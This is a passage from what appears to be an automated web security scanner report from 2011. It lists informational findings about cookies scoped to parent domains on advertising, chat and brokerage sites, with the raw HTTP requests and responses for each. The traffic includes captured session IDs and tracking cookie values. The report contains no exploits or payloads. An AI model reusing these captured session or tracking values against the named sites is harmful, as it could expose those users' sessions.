Set-Cookie: _tmpi=MjAxMTA5MDg_MjotNTY3NTYzMzQyMTY5OTg1NzUxNzozMHwxNDotNTY3NTYzMzQyMTY5OTg1NzUxNzozMA; Domain=.tubemogul.com; Expires=Fri, 07-Sep-2012 19:54:09 GMT; Path=/
Content-Type: application/xml
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close
Content-Length: 1334

<?xml version="1.0" encoding="UTF-8" standalone="no"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" version="2"><Response><PlayerUpdateResponse requestStatus="success"/
...[SNIP]...

9.45. http://receive.inplay.tubemogul.com/StreamReceiver/demo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /StreamReceiver/demo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /StreamReceiver/demo?segment=000&zip=&age=&gender= HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA; Domain=.tubemogul.com; Expires=Fri, 07-Sep-2012 19:54:09 GMT; Path=/
P3P: cp="NOI DSP COR LAW PSAo PSDo IVAo IVDo OUR BUS UNI DEM"
host: rcv-srv04
Content-Type: image/gif
Content-Length: 43
Date: Thu, 08 Sep 2011 19:54:08 GMT
Connection: close

GIF89a.............!.......,...........D..;

9.46. http://rtd.tubemogul.com/upi/pid/5w3jqr4k

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rtd.tubemogul.com
Path:   /upi/pid/5w3jqr4k

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /upi/pid/5w3jqr4k?puid=E1&tmid=-5675633421699857517 HTTP/1.1
Host: rtd.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/player/cc4ac375/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA; _tmpi=MjAxMTA5MDg_MTQ6LTU2NzU2MzM0MjE2OTk4NTc1MTc6MzA

Response

HTTP/1.1 200 OK
Expires: Thu, 8 Sep 2011 15:54:09 EDT
Set-Cookie: _tmpi=MjAxMTA5MDg_MzpFMTozMHwxNDotNTY3NTYzMzQyMTY5OTg1NzUxNzozMA;Path=/;Domain=.tubemogul.com;Expires=Fri, 07-Sep-12 19:54:09 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: cp="NOI DSP COR LAW PSAo PSDo IVAo IVDo OUR BUS UNI DEM"
Content-Type: image/png
Content-Length: 2791
Connection: close
Server: Jetty(7.0.1.v20091125)

.PNG
.
...IHDR..............wS....    pHYs..........+....
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

9.47. http://server.iad.liveperson.net/hc/82583755/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/82583755/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/82583755/?&site=82583755&cmd=mTagInPage&lpCallId=81533422560-705066007077&protV=20&lpjson=1&page=http%3A//www.pfgbest.com/toolkit/&id=3455414662&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true HTTP/1.1
Host: server.iad.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pfgbest.com/toolkit/
Cookie: HumanClickKEY=8343694331452677533; LivePersonID=-546022977410-1315512341:-1:-1:-1:-1; HumanClickSiteContainerID_82583755=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1315512340571

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:05:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_82583755=STANDALONE; path=/hc/82583755
Set-Cookie: LivePersonID=-546022977410-1315512341:-1:-1:-1:-1; expires=Fri, 07-Sep-2012 20:05:44 GMT; path=/hc/82583755; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 08 Sep 2011 20:05:44 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"81533422560-705066007077","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-30", "js_code": "lpMTag.lpInPageRequestDelay=30;"}]}});

9.48. http://shared.websol.barchart.com/css/bc_styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shared.websol.barchart.com
Path:   /css/bc_styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/bc_styles.css HTTP/1.1
Host: shared.websol.barchart.com
Proxy-Connection: keep-alive
Referer: http://www.transworldfutures.com/quotes.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:59:55 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Tue, 23 Aug 2011 19:10:14 GMT
ETag: "1915d8-e93-4ab30f2047180"
Accept-Ranges: bytes
Content-Length: 3731
Content-Type: text/css
Via: 1.1 websol.barchart.com (Apache/2.2.9)
P3P: CP="NON ADM OUR STP"
Set-Cookie: WEBSOL_SERVER=balancer.websol02; path=/; domain=.websol.barchart.com
Content-Language: en

@import url('options.css');
@import url('customquotes.css');
@import url('quickquotes.css');
@import url('searchbox.css');
@import url('lookup.css');
@import url('support.css');


.bcDisclaime
...[SNIP]...

9.49. http://www.facebook.com/dialog/feed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /dialog/feed

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: locale=en_US; expires=Thu, 15-Sep-2011 19:46:43 GMT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.238.47
Connection: close
Date: Thu, 08 Sep 2011 19:46:43 GMT
Content-Length: 15182

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/dialog\/feed";window._EagleEyeSeed="rM4U";</script><noscr
...[SNIP]...

9.50. http://www.interactivebrokers.com/mkt/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interactivebrokers.com
Path:   /mkt/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mkt/index.php?src=googlead&url=/futures&w=%22futures%20trading%22&kw=futures%20trading&c=US&gclid=CJS3rJiwjqsCFWUZQgod1yoIvg HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:24:40 GMT
Server: Apache
Set-Cookie: web=1059283; expires=Tue, 06-Mar-2012 19:24:40 GMT; path=/; domain=.interactivebrokers.com
Location: http://www.interactivebrokers.com/futures
Content-Length: 0
Connection: close
Content-Type: text/html


9.51. https://www.interactivebrokers.com/sso/Login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interactivebrokers.com
Path:   /sso/Login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/Login?forwardTo=1 HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:49:03 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: XYZAB_AM.LOGIN=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: XYZAB=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: URL_PARAM=forwardTo=1; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: JSESSIONID=6CABFA1224B746F03649A64DE5E8609E.wwwsso3; Path=/sso; Secure
Content-Length: 13244
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"/>
   <link hre
...[SNIP]...

9.52. http://www.optionsxpress.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=04B1BF674AA82952BE73E0BB9321CE27; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.53. http://www.optionsxpress.com/404.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /404.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /404.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=5389B1BA4FEE5685909C00A038A8CFC8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.54. http://www.optionsxpress.com/about_us/awards_media.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /about_us/awards_media.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us/awards_media.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23004
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=320A610B4D68A51B3DD0EDA975F816D5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.55. http://www.optionsxpress.com/about_us/contact_us.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /about_us/contact_us.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us/contact_us.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15835
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=D94486F745F6D69F0A802998A11A2DA7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.56. http://www.optionsxpress.com/about_us/faq.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /about_us/faq.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us/faq.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 111500
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=FDB057F449CCC1CA91E51FB7506FD090; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.57. http://www.optionsxpress.com/about_us/pricing_commissions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /about_us/pricing_commissions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about_us/pricing_commissions.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29277
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=3D1739C84DE61CD48C8F6B861E31DA2D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.58. http://www.optionsxpress.com/check_us_out/right_for_you.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /check_us_out/right_for_you.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check_us_out/right_for_you.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27517
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=715ECFF14E81ECE5EAFEBAAFF695BBCC; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...

9.59. http://www.optionsxpress.com/check_us_out/site_map.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /check_us_out/site_map.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check_us_out/site_map.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17804
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=D768A97844BACABDD1F614A652521D30; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.60. http://www.optionsxpress.com/corporate/about_us.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /corporate/about_us.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corporate/about_us.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16271
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=327ED9384FEDA364E7B5AFB955A11898; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:42 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.61. http://www.optionsxpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527926087%27%5D%5D; s_campaign=gsus23305007; s_sq=%5B%5BB%5D%5D; TLTHID=380F36E2451D516527B89FB8B2599BF0; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 20 Mar 2009 15:16:36 GMT
Accept-Ranges: bytes
ETag: "062bdc6ea9c91:1003"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D651080C4FB698B6CDD7B5BFFD951C11; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:24:53 GMT

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

9.62. http://www.optionsxpress.com/free_education/education_center.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /free_education/education_center.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /free_education/education_center.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=1CA0C870418D7340D8EA988105E71B36; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:38 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

9.63. http://www.optionsxpress.com/free_education/live_events/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /free_education/live_events/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /free_education/live_events/ HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14135
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TLTHID=FAD2A00E48BCF7D008C49D8DF9519925; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.64. http://www.optionsxpress.com/free_education/virtual_trade.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /free_education/virtual_trade.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /free_education/virtual_trade.aspx HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 272
Content-Type: text/html
Location: http://www.optionsxpress.com/tools_research/virtual_trade.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2D4996A44048187A4C198BA79D16B45B; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:47:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1><p>The document has moved <a href="http://www.optionsxp
...[SNIP]...

9.65. http://www.optionsxpress.com/images/promo_static/ox.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optionsxpress.com
Path:   /images/promo_static/ox.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promo_static/ox.gif HTTP/1.1
Host: www.optionsxpress.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; TLTHID=DE89B10E4F7083341F7D2AB6DC49FE17; mbox=check#true#1315527980|session#1315527919598-875378#1315529780

Response

HTTP/1.1 200 OK
Content-Length: 3615
Content-Type: image/gif
Last-Modified: Tue, 06 Sep 2011 15:02:30 GMT
Accept-Ranges: bytes
ETag: "c88eaffa56ccc1:1c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
